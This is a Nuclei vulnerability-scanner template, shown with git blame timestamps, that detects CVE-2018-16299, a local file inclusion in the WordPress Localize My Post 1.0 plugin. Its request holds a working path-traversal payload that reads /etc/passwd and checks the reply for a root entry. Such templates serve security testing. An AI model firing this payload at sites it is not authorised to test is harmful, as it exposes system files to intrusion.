2021-06-25 07:13:55 +00:00
|
|
|
id: CVE-2018-16299
|
2021-06-24 22:46:32 +00:00
|
|
|
|
|
|
|
info:
|
2022-06-13 18:45:06 +00:00
|
|
|
name: WordPress Localize My Post 1.0 - Local File Inclusion
|
2021-07-19 12:47:12 +00:00
|
|
|
author: 0x_Akoko,0x240x23elu
|
2021-06-24 22:46:32 +00:00
|
|
|
severity: high
|
2022-06-20 16:12:53 +00:00
|
|
|
description: |
|
|
|
|
WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/45439
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html
|
|
|
|
- https://github.com/julianburr/wp-plugin-localizemypost/issues/1
|
2022-06-13 18:45:06 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16299
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2018-16299
|
|
|
|
cwe-id: CWE-22
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.11104
|
|
|
|
cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
framework: wordpress
|
|
|
|
vendor: localize_my_post_project
|
|
|
|
product: localize_my_post
|
|
|
|
tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018
|
2021-06-24 22:46:32 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-06-24 22:46:32 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-06-24 22:46:32 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|